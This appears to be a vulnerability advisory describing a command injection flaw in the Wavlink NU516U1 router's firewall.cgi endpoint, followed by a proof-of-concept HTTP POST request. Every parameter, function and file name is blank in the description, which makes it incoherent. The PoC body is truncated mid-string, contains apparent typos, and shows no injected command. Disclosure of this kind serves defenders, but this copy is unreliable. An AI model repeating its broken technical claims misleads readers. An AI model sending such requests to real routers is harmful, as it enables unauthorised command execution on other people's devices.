# Critical Vulnerability Information

## Overview

- Vendor: Wavlink
- Product: NU516U1
- Version: M16U1_V240425
- Type: Command Injection

## Vulnerability Description

Wavlink NU516U1 M16U1 V240425 has been found to contain a command injection vulnerability via the parameter in the function within the file.

## Vulnerability Details

In the function, the value of the parameter is retrieved from user input. If the parameter value is , the function is called. Within the function, the value of the parameter is obtained via a POST request, and then passed to the variable using the function, which is ultimately passed to the function for execution.

## POC (Proof of Concept)

```http
POST /cgi-bin/firewall.cgi HTTP/1.1
Host: 192.168.0.1
Content-Length: 133
Cache-Control: max-age=0
Accept-Language: zh-CN,zh;q=0.9
Origin: http://192.168.0.1
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/
Referer: http://192.168.0.1/html/networkSetting.shtml
Cookie: session=4338672393
Connection: keep-alive

firewall=websSysFirewall&blockSynFloodEnabled-1&pingFrmWANFilterEnabled-1&blockPortScanEnabled-1&r
```